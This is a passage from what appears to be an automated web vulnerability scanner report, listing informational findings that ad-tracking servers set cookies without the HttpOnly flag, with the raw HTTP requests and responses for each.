Set-Cookie: A3=idb7axqo02Hn00000h6GXaxsD0czK00000iVGCazDb02Hn00002iryraz5F09Fl0000aiGeHaztg0bBg00001izcpayfZ0bnA00001h6H6axsD0czK00000idb8axqo02Hn00000hZiFayN607xf00000hGtnaxCA0bKd00001ieWcaxuC035P00000iKJmayXi07Nz00001iVF7aztg02Hn00001iVEMazDb02Hn00001hRzPazYC07tg00001hRzOazYy07tg00001i9lAaxCA0bKd00003gy4faxT809wy0000kiznKax6T0bI400001iBoWax1n06UE00001hUeBaxLG0cdw00001iRc1az5S0cba00001htT2ax2d07aw00001i9lUaxwP0bKd00001iGxeaxBP07pd00001iuodaAyr09Fl00001imVBayg20cEt00001hUeyaxqd0cdw00001iwN7az7I0czK0000ciwZ+azjI0czK00005iBlzaxwY06UE00001hGtDaxxL0bKd00005hVo4axCA0bKd00003hGteaxw50bKd00001b2Xeayce04m400000gy4daxKP09wy00002gx4UayXj09wy00002ipIYayg10cEt00001iB.Uaxqo02Hn00005iznWax7U0bI400001; expires=Fri, 08-Jul-2011 08:59:31 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8dnC0000000002u28KY10000000000t.8Tjz0000000000tX97pN0000000001t.8P920000000001tV8Qvs0000000003tY8HLo0000000005tY95u+0000000001tU8Swk0000000005tX93Np0000000001tW8Jbw0000000004tV8T+c0000000001u48B100000000001tY8nf80000000000tX8V.x0000000001tZ8ZIR0000000002tV8nf90000000000tX9ajg0000000001u08QDY0000000001u18Jbt0000000003tY92de0000000002tW8SBq0000000001tZ93Nl0000000001tX8B0.0000000001tX8TZe000000000au09br40000000001u18B120000000005tX8Qvv0000000001tX5J3v0000000000tZ9br30000000001u18WhH0000000001tV8Ykb0000000001tZ84hv0000000002t.9br20000000002u186Y60000000001tW9c2I000000000hu08Swi0000000000tX851k000000000mtY8Swj0000000000tX95uB0000000001tX; expires=Fri, 08-Jul-2011 08:59:31 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sat, 09 Apr 2011 12:59:30 GMT
Connection: close
Content-Length: 1841

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
6.84. http://cf.addthis.com/red/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cf.addthis.com
Path:   /red/p.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /red/p.json?rb=0&gen=1000&gen=100&sid=4d9fa5c4fe37dbad&callback=_ate.ad.hrr&pub=acquisio&uid=4d97b40ad252fd37&url=http%3A%2F%2Fwww.pagevester.com%2Fen%2Fproduct%2FGoogle-Website-Optimizer.asp&9pvn5k HTTP/1.1
Host: cf.addthis.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NzIwVg%3d%3d; psc=0; bt=; dt=X; di=%7B%7D..1302308295.1FE|1302308295.60|1302197723.66; uid=4d97b40ad252fd37; uit=1

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Expires: Sat, 09 Apr 2011 00:18:36 GMT
Set-Cookie: di=1302308295.60|1302308295.1FE|1302197723.66; Domain=.addthis.com; Expires=Mon, 08-Apr-2013 00:18:36 GMT; Path=/
Set-Cookie: bt=""; Domain=.addthis.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA"
Set-Cookie: dt=X; Domain=.addthis.com; Expires=Mon, 09-May-2011 00:18:36 GMT; Path=/
Content-Type: text/javascript
Content-Length: 88
Date: Sat, 09 Apr 2011 00:18:36 GMT
Connection: close

_ate.ad.hrr({"urls":[],"segments":[],"loc":"MjAwMDFOQVVTREMyMTg4MTAyOTUxMTg4NDAwVg=="});
6.85. http://content.yieldmanager.com/ak/q.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.yieldmanager.com
Path:   /ak/q.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ak/q.gif?01AD=2-2-0E42073DDB098A30E424246B99EB0E47F055B96AFEF57B69A810DE0CCF688130-77F54ED43503AAD93ABF73369E18D4667A27884E640B9131D40E9AEFF7559037&01RI=EEEA60E55DC1402&01NA= HTTP/1.1
Host: content.yieldmanager.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540674267&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
Cache-Control: max-age=0
If-Modified-Since: Wed, 18 Oct 2006 18:25:22 GMT
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RMAK=CT-1; AK1=0

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 18 Oct 2006 18:25:22 GMT
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif
Cache-Control: max-age=3600
Date: Mon, 11 Apr 2011 16:51:19 GMT
Connection: close
Set-Cookie: RMAK=2-2-0E42073DDB098A30E424246B99EB0E47F055B96AFEF57B69A810DE0CCF688130-77F54ED43503AAD93ABF73369E18D4667A27884E640B9131D40E9AEFF7559037; expires=Mon, 09-May-2011 16:51:19 GMT; path=/ak/; domain=content.yieldmanager.com
Set-Cookie: AK1=1; expires=Mon, 11-Apr-2011 22:51:19 GMT; path=/; domain=content.yieldmanager.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"

GIF89a.............!.......,...........D..;
6.86. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4d97b40ad252fd37&curl=http%3a%2f%2fwww.ingeniux.com%2fsolutions%2fwebsite_optimization HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh38.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: acs=012020a1lj1wslxzt10; ipinfo=2lj1wsl0zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; adh=1lj9vce16024uj30103r01GruURMxXs000oan4uj4012wv013qzqpMFFn000000; vstcnt=3lj1wsl011l054e0lw120206d1w05szf4f4ze120105szf4ei39120105szf4ei9p120108pef4ls72120100000; clid=2lj1wsl01171iolb30nur9ak08zjm0092p040f08409; rdrlst=40o0ej3lj1wsl000000092p041196ljawc7000000012p0110e1lj1wsl000000092p040g87lj1wsl000000092p0407tclj1wsl000000092p040o51lj1wsl000000092p0410rdlj8uur000000052p041202lj1wsl000000092p041200lj1wsl000000092p041192ljam70000000022p020faelj1wsl000000092p040xvclj1wsl000000092p040xullj1wsl000000092p0409kjlj1wsl000000092p0411zklj1wsl000000092p040ejblj1wsl000000092p0410telj89uh000000072p04066plj1wsl000000092p0407o9lj1wsl000000092p0410falj1wsl000000092p040xw9lj1wsl000000092p040x1plj1wsl000000092p0406o2lj1wsl000000092p0407gqlj1wsl000000092p04; sglst=20r0s61jlj1wsl000000092p040f084098y6lj1wsl000000092p040f084099eslj9vce00oan0042p040f04404ag2lj89uh02mhq0072p040f074075t1lj1wsl000000092p040f08409bnxlj1wsl000000092p040f08409bnzlj1wsl000000092p040f0840944tlj1wsl000000092p040f084095sxlj1wsl000000092p040f08409433lj1wsl000000092p040f084096dklj1wsl000000092p040f08409abelj1wsl000000092p040f084094oxlj1wsl000000092p040f08409ab5lj1wsl000000092p040f084099uslj1wsl000000092p040f084093l3lj1wsl000000092p040f08409b04lj1wsl000000092p040f08409bnhlj1wsl000000092p040f084097xwlj1wsl000000092p040f084095q9lj1wsl000000092p040f084099c4lj1wsl000000092p040f084090tilj89uh02mhq0072p040f07407b1elj1wsl000000092p040f0840940ulj1wsl000000092p040f084093s0lj1wsl000000092p040f08409acblj1wsl000000092p040f08409a76lj1wsl000000092p040f08409

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=013020a0g1lj1wslxzt1b2pzxzt1b2pz; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: adh=1lj9vce16024uj30103r01GruURMxXs000oan4uj4012wv013qzqpMFFn000000; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: clid=2lj1wsl01171iolb30nur9ak0b2pz00a2q010f0940a; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=40p0ej3lj1wsl0000000a2q0110e1lj1wsl0000000a2q0110rdlj8uur000000062q010xvclj1wsl0000000a2q0109kjlj1wsl0000000a2q0111zklj1wsl0000000a2q010ejblj1wsl0000000a2q01066plj1wsl0000000a2q0110falj1wsl0000000a2q0106o2lj1wsl0000000a2q0107gqlj1wsl0000000a2q011196ljawc7000000022q0107tclj1wsl0000000a2q010g87lj1wsl0000000a2q010o51lj1wsl0000000a2q011202lj1wsl0000000a2q011200lj1wsl0000000a2q011192ljam70000000032q010faelj1wsl0000000a2q0110tyljczik000000012q010xullj1wsl0000000a2q0110telj89uh000000082q0107o9lj1wsl0000000a2q010xw9lj1wsl0000000a2q010x1plj1wsl0000000a2q01; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: sglst=2110s8y6lj1wsl0b2pz0092p000f0040061jlj1wsl0b2pz0092p000f004009eslj9vce00oan0052q010f05405ag2lj89uh04po30082q010f08408bnxlj1wsl0b2pz0092p000f004005t1lj1wsl0b2pz0092p000f00400bnwljczik000000012q010f01401bnzlj1wsl0b2pz0092p000f0040044tlj1wsl0b2pz0092p000f004005sxlj1wsl0b2pz0092p000f00400433lj1wsl0b2pz0092p000f004006dklj1wsl0b2pz0092p000f00400abelj1wsl0b2pz0092p000f00400434ljczik000000012q010f014014oxlj1wsl0b2pz0092p000f00400bo1ljczik000000012q010f01401ab5lj1wsl0b2pz0092p000f00400ab6ljczik000000012q010f014019uslj1wsl0b2pz0092p000f004009ulljczik000000012q010f014013l3lj1wsl0b2pz0092p000f00400b05ljczik000000012q010f014017illjczik000000012q010f01401b04lj1wsl0b2pz0092p000f00400bnhlj1wsl0b2pz0092p000f004007xwlj1wsl0b2pz0092p000f004004wnljczik000000012q010f014015q9lj1wsl0b2pz00a2q010f0940a9c4lj1wsl0b2pz0092p000f004000tilj89uh04po30082q010f08408b1elj1wsl0b2pz0092p000f0040040ulj1wsl0b2pz0092p000f00400acaljczik000000012q010f01401acblj1wsl0b2pz0092p000f004003s0lj1wsl0b2pz0092p000f00400a76lj1wsl0b2pz0092p000f00400a77ljczik000000012q010f01401; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Set-Cookie: vstcnt=3lj1wsl011l064e0lw120206d1w05szf4ei39120105szf4f4ze120105szf4exr512010b2pz4ls721201000004ei9p120108pef; Domain=media6degrees.com; Expires=Thu, 06-Oct-2011 00:18:20 GMT; Path=/
Location: http://ib.adnxs.com/setuid?entity=25&code=1iolb30nur9ak
Content-Length: 0
Date: Sat, 09 Apr 2011 00:18:19 GMT

6.87. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/TEDYGTRZH5DVRIBZAHSESJ  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/TEDYGTRZH5DVRIBZAHSESJ

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /c/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/TEDYGTRZH5DVRIBZAHSESJ?pv=13308427692.390978&cookie=&width=300&height=250&x=0&y=0&keyw=&cpm=g)))TaBSSQAMlloK5YOHrkVDzSd7jwYrP4F-O66RUg HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=6973263501&w=300&lmt=1302370451&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fcategory.asp%3FC%3D18197&dt=1302352451303&bpp=2&shv=r20110330&jsv=r20110321-2&correlator=1302352451347&frm=0&adk=3713764857&ga_vid=2033131009.1302352452&ga_sid=1302352452&ga_hid=753737825&ga_fc=0&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&eid=36813005&ref=http%3A%2F%2Fwww.wcax.com%2F&fu=0&ifi=1&dtd=384&xpc=9pTvkhsWFJ&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __adroll=bcd984c4c8ca2e4df161242b3eeee836

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 12:34:20 GMT
Connection: keep-alive
Set-Cookie: __adroll=bcd984c4c8ca2e4df161242b3eeee836; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/r/N34ZPOW5TRGMJKDEFHM2G4/SDUW4IOBWFCKJBD7TJN7TI/8dd71aa1a00828c4bb81e15eea66e425.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

6.88. http://d.adroll.com/pixel/24H2I4YFKNA3JHF7DBOLEQ/J2XVQLHIHRDGBKODSAL526  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.adroll.com
Path:   /pixel/24H2I4YFKNA3JHF7DBOLEQ/J2XVQLHIHRDGBKODSAL526

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/24H2I4YFKNA3JHF7DBOLEQ/J2XVQLHIHRDGBKODSAL526?pv=56845203321.42711&cookie=& HTTP/1.1
Host: d.adroll.com
Proxy-Connection: keep-alive
Referer: http://www.clickability.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Moved Temporarily
Server: nginx/0.7.67
Date: Sat, 09 Apr 2011 00:18:18 GMT
Connection: keep-alive
Set-Cookie: __adroll=99102395dda89e7fc755f9d3fc143623; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/
Pragma: no-cache
P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV'
Location: http://a.adroll.com/pixel/24H2I4YFKNA3JHF7DBOLEQ/J2XVQLHIHRDGBKODSAL526/NT4ZDKY4VNBDLG4GSD4LKH.js
Content-Length: 0
Cache-Control: no-store, no-cache, must-revalidate

6.89. http://d.audienceiq.com/r/dm/mkt/44/mpid//mpuid/4608069584519221037  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/44/mpid//mpuid/4608069584519221037

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/44/mpid//mpuid/4608069584519221037 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=35&mpid=-1&fpid=-1&rnd=8512174217442808463&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8070649251602538122

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8070649251602538122; Domain=.audienceiq.com; Expires=Thu, 06-Oct-2011 12:35:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:45 GMT

GIF89a.............!.......,...........D..;
6.90. http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4608069584519221037  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.audienceiq.com
Path:   /r/dm/mkt/73/mpid//mpuid/4608069584519221037

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/73/mpid//mpuid/4608069584519221037 HTTP/1.1
Host: d.audienceiq.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=35&mpid=-1&fpid=-1&rnd=8512174217442808463&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8070649251602538122

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=8070649251602538122; Domain=.audienceiq.com; Expires=Thu, 06-Oct-2011 12:35:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:44 GMT

GIF89a.............!.......,...........D..;
6.91. http://d.mediabrandsww.com/r/dm/mkt/3/mpid//mpuid/4608069584519221037  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.mediabrandsww.com
Path:   /r/dm/mkt/3/mpid//mpuid/4608069584519221037

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/3/mpid//mpuid/4608069584519221037 HTTP/1.1
Host: d.mediabrandsww.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=35&mpid=-1&fpid=-1&rnd=8512174217442808463&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4498968621943069278

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4498968621943069278; Domain=.mediabrandsww.com; Expires=Thu, 06-Oct-2011 12:35:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:45 GMT

GIF89a.............!.......,...........D..;
6.92. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4608069584519221037  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dm/mkt/4/mpid//mpuid/4608069584519221037

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4608069584519221037 HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=35&mpid=-1&fpid=-1&rnd=8512174217442808463&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3581095438620356821

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3581095438620356821; Domain=.p-td.com; Expires=Thu, 06-Oct-2011 12:35:45 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Sat, 09 Apr 2011 12:35:45 GMT

GIF89a.............!.......,...........D..;
6.93. http://d.p-td.com/r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d.p-td.com
Path:   /r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dt/id/L21rdC80L21waWQvMTgwNDg2NA/mpuid/4d97b063-cd55-fcc9-f79b-3dc3c331fd5b HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4608069584519221037&mktid=4&mpid=1051202&fpid=-1&rnd=2332477709495562306&nu=n&sp=n
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=3581095438620356821

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=3581095438620356821; Domain=.p-td.com; Expires=Thu, 06-Oct-2011 12:35:52 GMT; Path=/
Location: http://sync.mathtag.com/sync/img?mt_sgld=
Content-Length: 0
Date: Sat, 09 Apr 2011 12:35:52 GMT

6.94. http://d7.zedo.com/lar/v10-003/d7/jsc/flr.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /lar/v10-003/d7/jsc/flr.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /lar/v10-003/d7/jsc/flr.js?n=1318&c=43/41&s=17&d=14&w=728&h=90&l=http://clk.redcated/go/248038904/direct;wi.728;hi.90;ai.206431965.206955035;ct.1/01%3Fhref=&z=144475929 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://redcated/APM/iview/248038904/direct;wi.728;hi.90/01?click=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFgeo=2241452;expires=Tue, 10 Apr 2012 16:41:19 GMT;domain=.zedo.com;path=/;
Set-Cookie: ZEDOIDA=Ly@jTcGt89ZU50IFiGvPA5FH~041111;expires=Thu, 08 Apr 2021 16:41:19 GMT;domain=.zedo.com;path=/;
ETag: "7140dca9-4239-48dea89497900"
Vary: Accept-Encoding
X-Varnish: 2551699253
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=37
Date: Mon, 11 Apr 2011 16:41:19 GMT
Connection: close
Content-Length: 3092

// Copyright (c) 2000-2008 ZEDO Inc. All Rights Reserved.

var w0=new Image();

var zzStr="q=;z="+Math.random();var zzSection=17;var zzPat='';

var zzhasAd;


               
...[SNIP]...
6.95. http://data.adsrvr.org/map/cookie/google  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.adsrvr.org
Path:   /map/cookie/google

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /map/cookie/google?g_uuid=CAESEH8TJy1DtAWkatR5O_JKSYo&cver=1 HTTP/1.1
Host: data.adsrvr.org
Proxy-Connection: keep-alive
Referer: http://ad.adsrvr.org/container/7j9i29e.1.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TDID=21cdbada-af4d-4bb4-a408-f80583854814

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Cache-Control: private,no-cache, must-revalidate
Content-Type: image/gif
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV"
Date: Sat, 09 Apr 2011 00:19:02 GMT
Pragma: no-cache
Set-Cookie: TDID=21cdbada-af4d-4bb4-a408-f80583854814; domain=.adsrvr.org; expires=Mon, 09-Apr-2012 00:19:02 GMT; path=/
Set-Cookie: X-Mapping-fjhppofk=56D14B6C0CC14A5761E9A7895E1F89AF; path=/
Content-Length: 70

GIF89a...................!..NETSCAPE2.0.....!.......,................;
6.96. http://ds.addthis.com/red/psi/sites/www.ingeniux.com/p.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.addthis.com
Path:   /red/psi/sites/www.ingeniux.com/p.json

Issue detail

